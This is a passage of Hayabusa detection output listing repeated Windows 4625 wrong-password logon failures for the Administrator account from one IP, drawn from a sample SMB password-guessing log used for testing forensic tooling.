GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.800 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.854 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:25.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.030 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.271 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.555 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.952 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:27.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.247 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.893 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.970 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.394 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.081 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
